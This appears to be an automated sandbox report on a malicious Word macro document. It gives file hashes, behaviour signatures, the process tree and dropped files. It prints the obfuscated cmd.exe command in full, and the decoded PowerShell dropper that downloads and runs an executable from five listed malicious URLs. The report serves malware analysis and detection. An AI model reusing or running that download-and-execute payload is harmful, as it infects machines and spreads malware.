Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-05-2024 17:11

General

  • Target

    72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc

  • Size

    203KB

  • MD5

    72abbface4c8cea179df95e9717cfde4

  • SHA1

    c358ec289edd6febf28edd2c518ba43055c78086

  • SHA256

    f349dcd66a084e8b9b503b274d9128d22931497b78675b8e8ab424977db22275

  • SHA512

    653bd8f5e4c9d57b39545a7372f3273dbf573ce064ed4c450628f53402738cade128fafc0f8c79f011072edf9e20f9da9bbf3271f42b977ebc129bb3229f86f0

  • SSDEEP

    3072:Xte2dw99fk3vIAWHWaaYuK5vE0B8FlgN2zU/Li0LZ:9Hdw7kwAWHWFK5TBmlgNfLFZ

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    • exe.dropper: http://stalfond-n.ru/KDYGGWK
    • exe.dropper: http://skladvysotka.ru/tbf6tn5r
    • exe.dropper: http://tdov.ru/0KJ9f6g
    • exe.dropper: http://doop.pl/Q3XAEGW7
    • exe.dropper: http://tranz2000.net/del/4Wpsnr5sxD

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3036
      • C:\Windows\SysWOW64\CMd.exe
        CMd /V/C"s^e^t +{^,^'=^519 ^93^1 ^35^1^ 1^53^ 1^59^ 1^09 ^093 ^1^05^ ^109 910 1^0^9^ ^301 ^3^01 13^9 ^35^1^ ^5^09 ^039 0^1^5}^5^03^}^13^5{5^31h^5^0^9c^319t5^9^0^a310c^309^}9^3^0^;10^5k903a^051^e905r^1^59^b^0^5^1^;13^0M^05^3^X^913^o0^15$^0^9^1 1^5^0^m035^e^015^t^9^01I9^03^-5^1^3^e1^30k^1^90o^3^9^5v^3^1^0n^9^0^3^I^593^;^150)^1^03M^5^3^9^X193^o^519^$5^0^3 5^3^0,^0^1^3^I5^1^9P^1^59P^1^59$3^19(^195^e^0^15l0^19i1^0^3^F9^0^3^d^1^5^9a91^0o^9^53l5^9^1n0^5^9w^53^9o159D^1^3^5.5^3^9Q^9^3^5C^31^0m^351$9^1^3^{310y3^0^1r^5^9^3^t310{^30^5)3^95P^193R5^09^L^593$^3^90^ 93^5n^0^19i1^0^3 5^13^I3^5^0P3^5^0^P^53^1^$105(^15^0^h903c^3^1^0a93^0e^53^9r039^o51^3^f^301^;3^1^0^'91^5e^190x0^1^5^e^1^30^.190'^50^9+^139^i019a^3^05^L^3^0^5^$^95^0+^01^5^'5^9^1\95^0'^395^+^53^0c9^1^5^i05^9^l^390^b^39^1u^09^5p^053^:531v^51^9n^3^0^5e1^05^$^9^0^1=095^M1^0^9X^3^1^5^o^9^50$^1^5^0^;^1^03'9^0^3^2^0^19^990^360^39^'^0^31 ^3^0^5^=^3^0^1 ^0^5^3^i^0^19^a^3^9^5^L0^1^5$0^3^9;3^10)^15^0'5^01@^39^5'^0^5^1(1^0^9t^1^53^i^3^59^l^9^51p^3^19S^0^3^1.^3^51'9^5^0D^159x0^9^3s13559^0^1r5^3^0n3^59^s^01^3p9^05W1^35^459^0/^503l^1^0^9e^31^9^d1^0^3/^1^3^5^t9^30e^0^35n0^1^3^.^5^03^0^305^0^90^10^19^323^05^z^5^91n^9^1^5a510r^35^9t^1^95/^0^39/9^0^1^:^10^9p0^9^3^t0^53t93^1h^5^0^3@51^3735^9W150G1^5^0E0^91^A^935X^053^3^9^1^0Q^95^1/^3^1^9l019^p9^5^0^.0^39^p^5^9^1^o50^9^o031d^3^1^0/1^59/^09^1:^91^5p510^t5^39t10^9h530^@^30^9^g93^1^690^1^f^03^59^90^5J0^1^9K91^500^1^5/^09^1u^19^3r^3^5^1.^9^01v^903^o390d^50^1t^01^9/^3^9^5/^0^5^1^:953p^903t^3^0^9^t509h^1^50^@9^0^1r^9^1^55^539n50^1^t^1^5^3^653^0f^0^9^3^b01^9t^39^5/^90^5u^059r93^1.0^53^a^1^35^k5^13^t^319o^0^15s3^5^0y^01^3v^30^5^d539^a30^5^l^01^3k^5^10s^5^0^3/^0^31/9^3^1^:0^31p^95^0^t^539^t53^1^h^5^13@^1^3^0^K^19^5^W0^1^5G1^0^3G^30^5^Y^3^15^D^5^9^1^K^5^3^1/19^0^u^0^9^3r^5^9^1.50^1n^190^-51^3^d^3^0^1n^3^0^5o1^05f3^5^1l^0^5^1^a5^9^0t9^35s^1^09/9^1^3/901:^0^39^p03^5t90^5^t90^1h^139^'^5^01^=^50^9P^9^50R91^0^L^35^1$1^50;^359t0^3^1n^35^1e03^9^i9^51^l3^91C9^0^3b^391e3^5^1^W^5^93^.3^1^0t0^91e15^9N^3
95 ^3^0^9t^93^0c190e^135j^13^0b^5^3^1^o^0^5^9^-310^w^5^3^0^e^3^9^0n35^0=0^9^3Q^19^3C03^9m^9^5^1^$1^03^ ^9^1^3l^1^93^l^3^50e^13^5^h^310^s^509r0^93^e^390^w^1^50^o0^93^p&&^f^or /^L %^Z ^in (^14^15^,^-4^,^3)^d^o se^t ^'^`^,=!^'^`^,!!+{^,^':~%^Z,1!&&^i^f %^Z=^=^3 c^al^l %^'^`^,:~^5%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $mCQ=new-object Net.WebClient;$LRP='http://stalfond-n.ru/KDYGGWK@http://skladvysotka.ru/tbf6tn5r@http://tdov.ru/0KJ9f6g@http://doop.pl/Q3XAEGW7@http://tranz2000.net/del/4Wpsnr5sxD'.Split('@');$Lai = '692';$oXM=$env:public+'\'+$Lai+'.exe';foreach($PPI in $LRP){try{$mCQ.DownloadFile($PPI, $oXM);Invoke-Item $oXM;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1856

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      deac35bb2205e28e01ad8f6b7e390ee4

      SHA1

      13a5b658c15f1767889208f86d190ed1b5b2bef9

      SHA256

      0bc19509194659deca004fca5ec19f8da5acf1ee16fb1d3a33cff57decc4eed3

      SHA512

      270b494a2463b474612aa952ea45af31b23f3f07ad5027e2fa92a93355b5586071159e53bb6f2e005d1004a51934caccfafcd8a232ef9bada48548a82e8d193e

    • C:\Users\Admin\AppData\Local\Temp\CabDDC4.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarDF70.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c785f09c67e09b58cfb1cf93aac1bfd3

      SHA1

      9b16201906f0025560c3d8f368b12f13ea06b229

      SHA256

      3f2eff2fa74a13f4d7c771e9dc31f6a13c2d836805d9b8edc0b1a8c62a512bfa

      SHA512

      fa882d4fa8b29fe6e64998fc3580adb2c6e86516b19fc974dd92800c0f52fcabc90da59515d1c506cdcb6b3cd8043f48861d36db04fc226d94076df7238381d4

    • memory/640-19-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-17-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-137-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-226-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-225-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-122-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-66-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-52-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-49-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-48-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-38-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-24-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-23-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-22-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-21-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-0-0x000000002FD51000-0x000000002FD52000-memory.dmp

      Filesize

      4KB

    • memory/640-18-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-129-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-16-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-15-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-14-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-13-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-12-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-11-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-10-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-20-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-9-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-8-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-7-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-6-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-2-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB

    • memory/640-299-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB

    • memory/640-300-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/640-316-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB